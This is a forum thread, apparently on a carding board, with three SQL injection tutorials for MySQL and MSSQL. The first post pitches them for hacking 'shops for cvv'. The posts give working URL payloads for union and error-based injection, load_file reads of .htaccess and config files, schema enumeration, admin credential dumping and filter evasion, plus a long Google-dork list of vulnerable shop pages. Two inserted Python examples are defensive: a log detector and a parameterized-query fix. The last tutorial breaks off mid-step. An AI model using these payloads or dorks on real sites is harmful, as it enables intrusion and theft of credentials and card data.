  1. #1
    Posted by The Master (Verified Vendor; Location: Russia; Posts: 1,568)

    SQL Tutorial [3\3]

    sql tutorial [3]
    hi folks, this time i'm posting a good sql injection tutorial which i think will be a gem to sql injection learners who wish to hack their own shops for cvv etc. etc. this sql injection tutorial will clear most of your sql injection doubts and will cleanly phase in an attack strategy for you.


    sql injection is defined as:
    "the act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end sql database running behind the website or application executes sql commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."


    background information


    * it is considered the most common web vulnerability today
    * it's a flaw in the web application--not the db, or the server
    * can be injected into: cookies, forms, and url parameters


    lesson facts


    * this lesson uses mysql syntax for all examples.
    * this lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
    * this lesson only provides sql injection examples for url parameters since it is such a large subject on its own
    * this lesson gives small examples of filter evasion techniques


    the lesson


    some commands you will need to know:


    'union all select' : combines two or more select statements into one query and returns all rows


    'order by' : used to sort rows after a select statement is executed


    'load_file()' : loads a local file from the site or server; examples would be .htaccess or /etc/passwd


    'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file


    'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (you will understand better later)


    '--' : a comment


    '/*' : another type of comment


    injection sql queries into url parameters


    so you've found a site:


    http://www.site.com/index.php?id=5'


    and want to test if it's vulnerable to sql injections. begin by checking if you can execute some of your own queries, so try:


    /index.php?id=5 and 1=0--


    if after executing the above statement, nothing has happened and the page has remained the same, you can try:


    /index.php?id='


    if neither of those work, for the purposes of this tutorial move on to another site. otherwise, if a blank page showed up you just might be in luck!


    now we want to find how many columns and which ones are showing when the select statement is executed so we use:


    /index.php?id=5 order by 20


    if you get an error, decrement the number 20; if there is no error, continue incrementing until you get one, and then the number just before your error is the number of columns in the table you're selecting from.


    example:


    /index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16


    returns an error, then we know that there are 15 columns in our select statement.


    the next statement will null the id=5 so the script only executes our commands and not its own, and show us which columns we can extract data from:


    /index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--


    the comment comments out anything the script would append to the end of the statement so that only our statement is looked at.


    so now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. for this example let's pretend columns 5, 7, and 9 are showing.


    now we can begin gathering information!


    /index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,13,14,15--


    as you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? this is where concat() comes in:


    /index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58),version()),6,7,8,9,10,11,12,13,14,15--


    now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().


    the user() will usually give something like [email protected], but you may get lucky and get [email protected], in this instance you can try to brute force the ftp login. the version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!


    before we can check if we have load_file perms, we must get an fpd (full path disclosure) so we know exactly where the files are located that we're trying to open. below are some methods to get an fpd:


    /index.php?id[]=


    you could attempt to google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in google


    session cookie trick
    now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:


    /index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--


    if you see the .htaccess file, congrats! you have load_file() perms. now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. another idea would be to load .htpasswd after finding its location from .htaccess and then logging in to all the password-protected areas that you want to on the site.


    if you don't see the .htaccess file, i will include one more way to extract info by using sql injections.


    using information_schema.tables


    so you don't have load_file() perms? no problem, we can check for information_schema.tables.


    1) 'table_name' is the name of a table that exists in all information_schema tables on every site:


    /index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--


    if the site is showing information_schema.tables, the words 'character_sets' will appear in column 5. what can i do with character_sets you might be wondering. well, nothing that i'm going to show you, but you can find out other tables that exist on the site. the information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...then what do you think the information_schema.columns hold? that's right, a list of all the columns on the site. so rather than using just the above injection you could try any of the following:


    -/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--


    selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time


    -/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6,7,8,9,10,11,12,13,14,15 from information_schema.columns--


    selects all tables and the columns that go with each table, separated by a colon


    2) if none of the above queries give you anything except for 'character_sets' you will have to use enumeration to determine the names of the other tables:


    /index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "character_sets"--


    then it would show the next table in line so you would modify the above to say:


    where table_name != "character_sets" and table_name != "nexttableinline"--


    until no more tables show, then you can do the same for the columns.


    3) now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. to extract that info from the table, use:


    /index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--


    and you'll get the info you requested, of course you can modify that as you like such as:


    -/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--


    -/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='admin'


    replacing admin with the top user's name such as admin or owner etc..


    final tips


    with any luck, one of these methods has worked for you and you were able to accomplish your goal. however, if none of them worked, you can start guessing common table names and then columns:


    /index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users


    if the page shows up, you know the table exists and you can start guessing column names:


    /index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users


    if you get a username, good job you guessed a correct table and column, otherwise keep guessing.


    filter evasion techniques


    * you can url encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
    * rather than using 'union all select' try 'UnIoN aLl SeLeCt' to see if the filter checks case
    * try using the plus sign to split words up: 'uni'+'on'+' '+'all'+' '+'se'+'lect'
    * combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
    * be creative


    conclusion


    as the old tuxedojesus would summarise it in the olden days -


    “thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.”

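The probes laid out in the post above (the boolean test, `order by` column counting, `union all select`, `load_file(char(...))`, `information_schema` lookups, the `id[]=` path-disclosure trick and the case, comment and plus-sign evasions from the last section) all leave a recognisable trail in a web server's access log. The Python below is an added example written for this thread, not code from the post or its author: it normalises each request the way a defender's filter has to (repeated percent-decoding, quote-splicing removal, lower-casing, `/**/` stripping, separator collapsing) and then matches the tutorial's own patterns. The log lines, IP addresses, rule names and the `normalise`/`scan_log` helpers are all constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache-style, trimmed). The requests
# mirror the probes shown in the post above; none were captured from a server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=5%20and%201=0-- HTTP/1.1" 200 311
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=5%20order%20by%2016 HTTP/1.1" 500 211
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- HTTP/1.1" 200 4800
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=null+UnIoN/**/aLl/**/SeLeCt+1,2,load_file(char(47,101,116,99)),4+from+information_schema.tables-- HTTP/1.1" 200 4900
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id[]= HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=union+station+hotels HTTP/1.1" 200 7000
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php?id=null+%27uni%27%2B%27on%27%2B%27%20%27%2B%27all%27%2B%27%20%27%2B%27se%27%2B%27lect%27+1,2,3-- HTTP/1.1" 200 4800
"""

# Request line inside the quoted part of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Detection rules, applied to the normalised query string. Names are our own.
RULES = [
    ("boolean probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),
    ("column count probe", re.compile(r"\border\s+by\s+\d+")),
    ("union-based injection", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("file read attempt", re.compile(r"\bload_file\s*\(")),
    ("schema enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("char() obfuscation", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)")),
    ("full path disclosure probe", re.compile(r"(^|&)[a-z_]+\[\]=")),
]


def normalise(target: str) -> str:
    """Canonicalise the query string of a request target so that the evasions
    listed in the post (encoding, case, /**/ comments, '+' splicing) collapse
    back onto the plain SQL keywords the rules look for."""
    query = target.partition("?")[2]
    for _ in range(3):                        # bounded: handles double encoding
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"'\+'", "", query)        # 'uni'+'on' -> 'union'
    query = query.lower()                     # UnIoN -> union
    query = re.sub(r"/\*.*?\*/", " ", query)  # union/**/select -> union select
    query = re.sub(r"[\s+]+", " ", query)     # '+' and runs of blanks -> one space
    return query.strip()


def scan_log(text: str):
    """Return one (client_ip, [rule names], normalised_query) tuple per request
    that trips at least one rule; clean requests are skipped."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        query = normalise(match.group("target"))
        hits = [name for name, pattern in RULES if pattern.search(query)]
        if hits:
            findings.append((client_ip, hits, query))
    return findings


if __name__ == "__main__":
    for client_ip, hits, query in scan_log(SAMPLE_LOG):
        print(f"{client_ip}: {', '.join(hits)} -> {query}")
```

The benign `q=union+station+hotels` request is not flagged because the rules key on keyword combinations (`union ... select`, `order by N`, `and 1=0`) rather than single words; the point of `normalise` is that the same rules fire whether the keywords arrive mixed-case, percent-encoded twice, split by `/**/` or spliced with quotes and plus signs.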
  2. #2
    sql tutorial [2\2]
    we hacked lots of mysql sites... now it's time to target microsoft.


    hope u will enjoy it....


    lets start...


    there are various types of sql injection for microsoft here as follows


    1)odbc error message attack with "convert"
    2)odbc error message attack with "having" and "group by"
    3)mssql injection with union attack
    4)mssql injection in web services (soap injection)
    5)mssql blind sql injection attack


    i will be explaining various methods of sqli in my various tuts..
    so for now we will start with the easiest method of sqli, with convert


    step 1:
    first we need to find a vulnerable site.


    by adding a single quote ('), double quote (") or a semicolon (;) to the field under test.


    eg
    iana - example domains'
    iana - example domains


    it's vulnerable to sql injection if the output shows some error like this:


    [http response]------------------------------------------------------------------------------
    microsoft ole db provider for odbc drivers error '80040e14'
    [microsoft][odbc sql server driver][sql server]unclosed quotation mark before the
    character string ''.
    /news.asp, line 52
    [end http response]-------------------------------------------------------------------------


    also error could be something like below


    microsoft ole db provider for sql server error '80040e14 '
    open quotation mark after the character string ") and (volgorde> 0) order by volgorde '.
    ..../ main_rub.asp, line 4


    if errors like the above are shown then the site could be vulnerable to sql injection


    also you can find vulnerable site from google dork.


    eg


    inurl:page.asp?id=
    inurl:index.asp?sid=


    code:
    ".asp?bookid="
    ".asp?cart="
    ".asp?cartid="
    ".asp?catalogid="
    ".asp?category_list="
    ".asp?categoryid="
    ".asp?catid="
    ".asp?cid="
    ".asp?code_no="
    ".asp?code="
    ".asp?designer="
    ".asp?framecode="
    ".asp?id="
    ".asp?idcategory="
    ".asp?idproduct="
    ".asp?intcatalogid="
    ".asp?intprodid="
    ".asp?item_id="
    ".asp?item="
    ".asp?itemid="
    ".asp?maingroup="
    ".asp?misc="
    ".asp?newsid="
    ".asp?order_id="
    ".asp?p="
    ".asp?pid="
    ".asp?prodid="
    ".asp?product_id="
    ".asp?product="
    ".asp?productid="
    ".asp?showtopic="
    ".asp?sku="
    ".asp?storeid="
    ".asp?style_id="
    ".asp?styleid="
    ".asp?userid="
    "about.asp?cartid="
    "accinfo.asp?cartid="
    "acclogin.asp?cartid="
    "add.asp?bookid="
    "add_cart.asp?num="
    "addcart.asp?"
    "additem.asp"
    "add-to-cart.asp?id="
    "addtocart.asp?idproduct="
    "addtomylist.asp?prodid="
    "admineditproductfields.asp?intprodid="
    "advsearch_h.asp?idcategory="
    "affiliate.asp?id="
    "affiliate-agreement.cfm?storeid="
    "affiliates.asp?id="
    "ancillary.asp?id="
    "archive.asp?id="
    "article.asp?id="
    "aspx?pageid"
    "basket.asp?id="
    "book.asp?bookid="
    "book_list.asp?bookid="
    "book_view.asp?bookid="
    "bookdetails.asp?id="
    "browse.asp?catid="
    "browse_item_details.asp"
    "browse_item_details.asp?store_id="
    "buy.asp?"
    "buy.asp?bookid="
    "bycategory.asp?id="
    "cardinfo.asp?card="
    "cart.asp?action="
    "cart.asp?cart_id="
    "cart.asp?id="
    "cart_additem.asp?id="
    "cart_validate.asp?id="
    "cartadd.asp?id="
    "cat.asp?icat="
    "catalog.asp"
    "catalog.asp?catalogid="
    "catalog_item.asp?id="
    "catalog_main.asp?catid="
    "category.asp"
    "category.asp?catid="
    "category_list.asp?id="
    "categorydisplay.asp?catid="
    "checkout.asp?cartid="
    "checkout.asp?userid="
    "checkout_confirmed.asp?order_id="
    "checkout1.asp?cartid="
    "comersus_listcategoriesandproducts.asp?idcate gory ="
    "comersus_optemailtofriendform.asp?idproduct="
    "comersus_optreviewreadexec.asp?idproduct="
    "comersus_viewitem.asp?idproduct="
    "comments_form.asp?id="
    "contact.asp?cartid="
    "content.asp?id="
    "customerservice.asp?textid1="
    "default.asp?catid="
    "description.asp?bookid="
    "details.asp?bookid="
    "details.asp?press_release_id="
    "details.asp?product_id="
    "details.asp?service_id="
    "display_item.asp?id="
    "displayproducts.asp"
    "downloadtrial.asp?intprodid="
    "emailproduct.asp?itemid="
    "emailtofriend.asp?idproduct="
    "events.asp?id="
    "faq.asp?cartid="
    "faq_list.asp?id="
    "faqs.asp?id="
    "feedback.asp?title="
    "freedownload.asp?bookid="
    "fulldisplay.asp?item="
    "getbook.asp?bookid="
    "getitems.asp?itemid="
    "giftdetail.asp?id="
    "help.asp?cartid="
    "home.asp?id="
    "index.asp?cart="
    "index.asp?cartid="
    "index.asp?id="
    "info.asp?id="
    "item.asp?eid="
    "item.asp?item_id="
    "item.asp?itemid="
    "item.asp?model="
    "item.asp?prodtype="
    "item.asp?shopcd="
    "item_details.asp?catid="
    "item_list.asp?maingroup"
    "item_show.asp?code_no="
    "itemdesc.asp?cartid="
    "itemdetail.asp?item="
    "itemdetails.asp?catalogid="
    "learnmore.asp?cartid="
    "links.asp?catid="
    "list.asp?bookid="
    "list.asp?catid="
    "listcategoriesandproducts.asp?idcategory="
    "modline.asp?id="
    "myaccount.asp?catid="
    "news.asp?id="
    "order.asp?bookid="
    "order.asp?id="
    "order.asp?item_id="
    "orderform.asp?cart="
    "page.asp?partid="
    "payment.asp?cartid="
    "pdetail.asp?item_id="
    "powersearch.asp?cartid="
    "price.asp"
    "privacy.asp?cartid="
    "prodbycat.asp?intcatalogid="
    "prodetails.asp?prodid="
    "prodlist.asp?catid="
    "product.asp?bookid="
    "product.asp?intprodid="
    "product_info.asp?item_id="
    "productdetails.asp?idproduct="
    "productdisplay.asp"
    "productinfo.asp?item="
    "productlist.asp?viewtype=category&categoryid= "
    "productpage.asp"
    "products.asp?id="
    "products.asp?keyword="
    "products_category.asp?categoryid="
    "products_detail.asp?categoryid="
    "productsbycategory.asp?intcatalogid="
    "prodview.asp?idproduct="
    "promo.asp?id="
    "promotion.asp?catid="
    "pview.asp?item="
    "resellers.asp?idcategory="
    "results.asp?cat="
    "savecart.asp?cartid="
    "search.asp?cartid="
    "searchcat.asp?search_id="
    "select_item.asp?id="
    "services.asp?id="
    "shippinginfo.asp?cartid="
    "shop.asp?a="
    "shop.asp?action="
    "shop.asp?bookid="
    "shop.asp?cartid="
    "shop_details.asp?prodid="
    "shopaddtocart.asp"
    "shopaddtocart.asp?catalogid="
    "shopbasket.asp?bookid="
    "shopbycategory.asp?catid="
    "shopcart.asp?title="
    "shopcreatorder.asp"
    "shopcurrency.asp?cid="
    "shopdc.asp?bookid="
    "shopdisplaycategories.asp"
    "shopdisplayproduct.asp?catalogid="
    "shopdisplayproducts.asp"
    "shopexd.asp"
    "shopexd.asp?catalogid="
    "shopping_basket.asp?cartid="
    "shopprojectlogin.asp"
    "shopquery.asp?catalogid="
    "shopremoveitem.asp?cartid="
    "shopreviewadd.asp?id="
    "shopreviewlist.asp?id="
    "shopsearch.asp?categoryid="
    "shoptellafriend.asp?id="
    "shopthanks.asp"
    "shopwelcome.asp?title="
    "show_item.asp?id="
    "show_item_details.asp?item_id="
    "showbook.asp?bookid="
    "showstore.asp?catid="
    "shprodde.asp?sku="
    "specials.asp?id="
    "store.asp?id="
    "store_bycat.asp?id="
    "store_listing.asp?id="
    "store_viewproducts.asp?cat="
    "store-details.asp?id="
    "storefront.asp?id="
    "storefronts.asp?title="
    "storeitem.asp?item="
    "storeredirect.asp?id="
    "subcategories.asp?id="
    "tek9.asp?"
    "template.asp?action=item&pid="
    "topic.asp?id="
    "tuangou.asp?bookid="
    "type.asp?itype="
    "updatebasket.asp?bookid="
    "updates.asp?id="
    "view.asp?cid="
    "view_cart.asp?title="
    "view_detail.asp?id="
    "viewcart.asp?cartid="
    "viewcart.asp?userid="
    "viewcat_h.asp?idcategory="
    "viewevent.asp?eventid="
    "viewitem.asp?recor="
    "viewprd.asp?idcategory="
    "viewproduct.asp?misc="
    "votelist.asp?item_id="
    "whatsnew.asp?idcategory="
    "wsancillary.asp?id="
    "wspages.asp?id="
    step 2:


    now we have our vulnerable website.
    the convert command is used to convert between two data types, and when the specific
    data cannot be converted to the other type an error will be returned.


    now we start with our assessment by finding mssql_version, db_name.


    iana - example domains


    [http response]-------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'microsoft sql server 2005 - 9.00.4053.00
    (intel x86) may 26 2009 14:24:20 copyright (c) 1988-2005 microsoft corporation
    standard edition on windows nt 5.2 (build 3790: service pack 2) ' to data type int.


    /includes/templates/header.asp, line 21


    -----------------------------------------------------------


    we know now it's a microsoft sql server 2005 and the os is windows 2003 server (build 3790: service pack 2)


    let's go to enumerate db_name.


    iana - example domains


    [http response]--------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'ipc' to data type int.


    /includes/templates/header.asp, line 21
    ------------------------------------------------------------


    the data base name is ipc.


    iana - example domains


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'ipcdc' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------


    the operating database in use is ipcdc....


    step 3:
    now lets find tables in database


    iana - example domains e_name+from+information_schema.tables))--


    "information_schema.tables" stores information about tables in databases and there is a field called "table_name"
    which stores names of each table."select top 1" will show first table in database.
    the result of this request is something like this:


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'sitestatus' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------


    therefore, we know the first table = "sitestatus", from this error. the next step is looking for the second table.
    we only append a where clause to the query in the above request.
    iana - example domains e_name+from+information_schema.tables+where+table_name+not+in+('sitestatus')))--


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'headergraphic' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------


    second table 'headergraphic'
    iana - example domains e_name+from+information_schema.tables+where+table_name+not+in+('sitestatus','headergraphic')))--


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'admin' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    third table 'admin'


    like this you will get each table name from the error.
    iana - example domains e_name+from+information_schema.tables+where+table_name+not+in+('sitestatus','headergraphic','admin')))--


    if the query returns something like this.


    [http response]----------------------------------------
    adodb.field error '800a0bcd'
    either bof or eof is true, or the current record has been deleted. requested operation requires a current record.
    /page.asp, line 22


    -----------------------------------------------------------------


    it means the database contains only 3 tables: 'sitestatus', 'headergraphic' and 'admin'.


    step 4:
    now we are all set.....and we will find columns in admin table


    we merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
    but we have to add "table_name" in the where clause in order to specify the table which we will pull column names from.
    iana - example domains mn_name+from+information_schema.columns+where+table_name='admin'))--


    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'username' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    iana - example domains mn_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--


    the response will be
    [http response]----------------------------------------
    microsoft ole db provider for sql server error '80040e07'


    conversion failed when converting the nvarchar value 'passwd' to data type int.


    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    so 2nd column is 'passwd'




    do this like we did the url manipulation for tables....
    don't forget to add the where clause.
    until you get an error like this
    [http response]----------------------------------------
    adodb.field error '800a0bcd'
    either bof or eof is true, or the current record has been deleted. requested operation requires a current record.
    /page.asp, line 22


    -----------------------------------------------------------------


    step 5: retrieving username and password etc


    now lets see what we got from above


    table_name: 'admin', 'sitestatus' and 'headergraphic'


    here we are interested in 'admin', so we found the columns of 'admin'


    column_name: 'username' and 'passwd'


    lets do our work now


    iana - example domains name+from+admin))--
    you will get first username in terms of error
    eg sa_admin
    iana - example domains wd+from+admin))--


    you will get passwd.
    eg comic123




    so you own the mssql server with


    username: sa_admin
    password:comic123
    [note:
    1) you can use and/or both
    2) don't forget the , (comma) after 'int' in convert()
    3) in the error, what comes after ' (upper comma) is your table_name or column_name etc.
    4) you can enumerate more usernames and passwords by using the 'not' command]

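Every step in the MSSQL post above, and in the MySQL one before it, depends on two application defects: the request parameter is pasted into the SQL text, and the database driver's error message is returned to the browser (the `convert()` trick only works because of the second one). The Python below is an added example, not code from the posts, that puts the vulnerable pattern beside its fix on an in-memory SQLite database. The `news`/`admin` schema, the rows, the function names and the payload wording are constructed for the example, and SQLite stands in for MySQL/MSSQL because it ships with Python; the union payload is the form shown in the tutorial, fed to both versions of the lookup.

```python
import sqlite3

QUERY = "SELECT id, title, body FROM news WHERE id = "   # shared query text


def make_db() -> sqlite3.Connection:
    """Throwaway in-memory database; the schema and rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (5, 'Hello', 'First post');
        CREATE TABLE admin(username TEXT, passwd TEXT);
        INSERT INTO admin VALUES ('admin', 'not-a-real-hash');
    """)
    return con


def vulnerable_lookup(con: sqlite3.Connection, raw_id: str) -> dict:
    """The pattern the posts exploit: the parameter is concatenated into the
    SQL text, and the driver's own error text is handed back to the client."""
    sql = QUERY + raw_id
    try:
        return {"rows": con.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"error": str(exc)}            # verbose error = information leak


def hardened_lookup(con: sqlite3.Connection, raw_id: str) -> dict:
    """Same lookup with the value bound as a parameter: whatever the string
    contains, it is compared against the id column, never parsed as SQL.
    Driver errors are logged server-side and replaced by a generic message."""
    try:
        rows = con.execute(QUERY + "?", (raw_id,)).fetchall()
        return {"rows": rows}
    except sqlite3.Error:
        return {"error": "internal error"}    # log the exception here, never echo it


if __name__ == "__main__":
    con = make_db()
    payload = "null union all select 1,username,passwd from admin--"
    for value in ("5", "5'", payload):
        print("vulnerable:", vulnerable_lookup(con, value))
        print("hardened:  ", hardened_lookup(con, value))
```

Running the module shows the three cases side by side: a normal id works in both versions, a stray quote makes the concatenating version return the driver's "unrecognized token" text (the equivalent of the ODBC messages quoted above), and the union payload pulls the `admin` row out of the concatenating version while the bound version simply finds no news item with that id. Both fixes belong together: binding stops the injection, and the generic error message stops the remaining error text from being used as a data channel.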
  3. #3
    sql tutorial [1\1]
    in this tutorial i will describe how sql injection works and how to
    use it to get some useful information.


    first of all: what is sql injection?
    it’s one of the most common vulnerabilities in web applications today.
    it allows an attacker to execute database queries via the url and gain access
    to some confidential information etc… (in short).


    1.sql injection (classic or error based or whatever you call it)
    2.blind sql injection (the harder part)


    so let’s start with some action


    1). check for vulnerability
    let’s say that we have some site like this
    http://www.site.com/news.php?id=5
    now to test if it is vulnerable we add ' (quote) to the end of the url,
    and that would be http://www.site.com/news.php?id=5'
    so if we get some error like
    “you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right etc…”
    or something similar
    that means it is vulnerable to sql injection


    2). find the number of columns
    to find number of columns we use statement order by (tells database how to order the result)
    so how to use it? well just incrementing the number until we get an error.
    http://www.site.com/news.php?id=5 order by 1/* <– no error
    http://www.site.com/news.php?id=5 order by 2/* <– no error
    http://www.site.com/news.php?id=5 order by 3/* <– no error
    http://www.site.com/news.php?id=5 order by 4/* <– error (we get a message like this: unknown column '4' in 'order clause' or something like that)
    that means that it has 3 columns, because we got an error on 4.


    3). check for union function
    with union we can select more data in one sql statement.
    so we have
    http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
    if we see some numbers on screen, i.e 1 or 2 or 3 then the union works


    4). check for mysql version
    http://www.site.com/news.php?id=5 union all select 1,2,3/* note: if /* is not working or you get some error, then try --
    it’s a comment and it’s important for our query to work properly.
    let say that we have number 2 on the screen, now to check for version
    we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
    it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
    if you get an error “union + illegal mix of collations (implicit + coercible) …”
    i didn’t see any paper covering this problem, so i must write it
    what we need is convert() function
    i.e.
    http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
    or with hex() and unhex()
    i.e.
    http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
    and you will get mysql version


    5). getting table and column name
    well if the mysql version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for mysql > 5 version.
    we must guess table and column name in most cases.
    common table names are: user/s, admin/s, member/s …
    common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
    i.e would be
    http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good )
    we know that table admin exists…
    now to check column names.
    http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
    we get username displayed on screen, example would be admin, or superadmin etc…
    now to check if column password exists
    http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
    we see the password on the screen as a hash or in plain-text, it depends on how the database is set up
    i.e md5 hash, mysql hash, sha1…
    now we must complete query to look nice
    for that we can use concat() function (it joins strings)
    i.e
    http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
    note that i put 0x3a, it's the hex value for : (so 0x3a is the hex value for colon)
    (there is another way for that, char(58), the ascii value for : )
    http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
    now we get username:password displayed on screen, i.e admin:admin or admin:somehash
    when you have this, you can login like admin or some superuser
    if you can’t guess the right table name, you can always try mysql.user (default)
    it has user and password columns, so the example would be
    http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*


    6). mysql 5
    like i said before i’m gonna explain how to get table and column names
    in mysql > 5.
    for this we need information_schema. it holds all tables and columns in database.
    to get tables we use table_name and information_schema.tables.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
    here we replace our number 2 with table_name to get the first table from information_schema.tables
    displayed on the screen. now we must add limit to the end of query to list out all tables.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
    note that i put 0,1 (get 1 result starting from the 0th)
    now to view the second table, we change limit 0,1 to limit 1,1
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
    the second table is displayed.
    for third table we put limit 2,1
    i.e
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
    keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc…
    to get the column names the method is the same.
    here we use column_name and information_schema.columns
    the method is the same as above so the example would be
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    the first column is displayed.
    the second one (we change limit 0,1 to limit 1,1)
    i.e.
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
    the second column is displayed, so keep incrementing until you get something like
    username, user, login, password, pass, passwd etc…
    if you wanna display column names for a specific table use this query. (where clause)
    let's say that we found table users.
    i.e
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
    now we get the column names in table users displayed. just using limit we can list all columns in table users.
    note that this won't work if magic quotes is on.
    let's say that we found columns user, pass and email.
    now to complete the query to put them all together
    for that we use concat(), i described it earlier.
    i.e
